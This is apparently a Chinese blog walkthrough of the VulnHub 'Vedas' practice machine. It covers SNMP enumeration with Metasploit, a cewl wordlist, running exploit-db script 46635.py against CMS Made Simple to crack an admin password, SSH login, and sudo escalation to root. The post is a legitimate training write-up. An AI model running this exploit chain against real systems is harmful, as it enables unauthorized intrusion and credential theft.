vulnhub 之 vedas

目录

信息搜集

扫描网段确定真实IP地址

扫描IP地址确定开放端口以及服务

 浏览器查看web网站

扫描网站目录

使用dirb扫

扫描udp服务

发现漏洞

获取第一个flag

使用msf工具搜索snmp利用模块

 获取第二个flag

爬取网站信息作为扫描网站目录的字典扫描该网站目录

 访问扫描出的网站目录

Whatweb

 searchsploit

 使用漏洞利用脚本得到第二个flag

 获取第三个flag

登录ssh

查看各种文件最终找到第三个flag

提权

将之前的到的3个flag中的way to root组合起来

 将该结果作为vedas的密码登录

尝试提权到root

 总结

参考文章


信息搜集

 

扫描网段确定真实IP地址

扫描IP地址确定开放端口以及服务

 浏览器查看web网站

好像就是一个普普通通的网站,甚至都没有什么功能点,有个搜索键还是假的。所以再web方面并没有发现什么有用的信息

扫描网站目录

dirsearch -u http://192.168.179.164

 几乎等同于没有收获,我一开始还去访问了/images/目录发现12345689都有就是没有7,我还以为隐藏起来了,结果并没有就是不存在,还尝试过去找图片内的信息(隐写相关)都以失败告终。

使用dirb扫

dirb http://192.168.179.164

结果几乎是一样的

扫描udp服务

看样子http这边是行不通了,当时在我看来就只剩ssh服务了,ssh在中间件没有问题的情况下只能是暴力破解,于是从网站页面爬了个字典,用户名和密码一起跑。欸  也没跑出来。麻了  兄弟们。

开启偷瞄,发现是udp的服务,唉  ,也不难就是一个思路问题,我咋就没想到呢,之前也不是没碰见过,长记性下次再没思路记得一定试试udp

nmap -sU 192.168.179.164

 

发现漏洞

获取第一个flag

使用msf工具搜索snmp利用模块

msfconsole
search snmp
use  auxiliary/scanner/snmp/snmp_enum
show options
set rhost   192.168.179.164
run
####
获取到第一个flag:
Way to Root:1 (0e462097431)
Rig Veda: {0e87105d070afcb11c7264cc13f2e86b}

 该模块的作用是获取到community,如果有可读权限,可以使用这个模块读取系统信息

 获取第二个flag

爬取网站信息作为扫描网站目录的字典扫描该网站目录

cewl  http://192.168.179.164/  > /tmp/user.txt
cd /tmp
dirb http://192.168.179.164 user.txt

 

 访问扫描出的网站目录

 看这个网站主页也很明白了,就跟cms相关的呗,simple但是没有具体的版本号,还是要搞到版本号才好有针对性的下手

Whatweb

whatweb是一款开源的网站指纹识别软件,同时也是集成在kali上了所以用起来也很方便,Whatweb可识别的web技术,包括内容管理系统(CMS),博客平台,统计/分析包,Javascript库,服务器和嵌入式设备。使用教程

whatweb http://192.168.179.164/Kashyapa/

 searchsploit

searchsploit  CMS Made Simple 2.2.8

 使用漏洞利用脚本得到第二个flag

locate php/webapps/46635.py
scp /usr/share/exploitdb/exploits/php/webapps/46635.py  /tmp
python 46635.py -u http://192.168.179.164/Kashyapa/ --crack -w user.txt

提示报错缺少termcolor模块,去官网下载并解压导入

tar -zxvf termcolor-1.1.0.tar.gz
cd termcolor-1.1.0
python setup.py install
python 46635.py -u http://192.168.179.164/Kashyapa/ --crack -w user.txt
#####

[+] Salt for password found: 65bd8602d290b16d
[+] Username found: atri
[+] Email found: abcd@gmail.com
[+] Password found: 49ba135760e8265758ae48ef5c7338c7
[+] Password cracked: anasuya

 扫描二级目录

dirsearch -u http://192.168.179.164/Kashyapa/

 还是有很多信息的,我们这边就不一一查看了。因为的得到了一个用户名和密码所以我们这边直接找登录页面

http://192.168.179.164/Kashyapa/admin/login.php

使用我们之前得到的用户名和密码进行登录

用户名:atri
密码:anasuya
####
登录后在后台找到flag
Yagur Veda: {81b44a402a34a850dfcf1e277a18234d}

Way to Root:2 (906509019)

 获取第三个flag

登录ssh

除了网站后台还有一个可用于登录的地方,那就是ssh(我可一直记着你呢)

ssh atri@192.168.179.164
anasuya

查看各种文件最终找到第三个flag

cd /opt/
ls -al
cd test/
ls -al
cat index.html
######
Sama Veda: {c9a9aeb104157fb92f781714d010099c}
Way to Root:3 (562988736854)

提权

我们在翻看各种文件的时候发现家目录下还有一个用户

 一般来说按照出题人的套路一般都是一个用户下一个flag,所以我们应该要想办法切换到vedas用户中去

将之前的到的3个flag中的way to root组合起来

得到

得到:0e462097431906509019562988736854
md5解密:240610708

 将该结果作为vedas的密码登录

su vedas
240610708

 该用户家目录下并没有flag,尝试进入root目录

失败

尝试提权到root

 

sudo -l
sudo su
cd /root
cat final.txt

 总结

这个靶机总的来说难度不是很高,对我来说就是有些思路想不到,这种靶机应该就更类似CTF一样,所以还是要多做题培养自己的解题思路。比如说一开始扫描udp服务,你说这种知识点难嘛,也不难,但是我就是没想到,还有一个就是最后把3个flag组合起来然后解密是我没想到的。相比之下我更喜欢前面的那两个靶机,总感觉出题的痕迹特别明显然后有些题解着特别牵强。

参考文章

https://www.cnblogs.com/gaonuoqi/p/14958209.html
https://www.hackingarticles.in/ha-vedas-vulnhub-walkthrough/

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值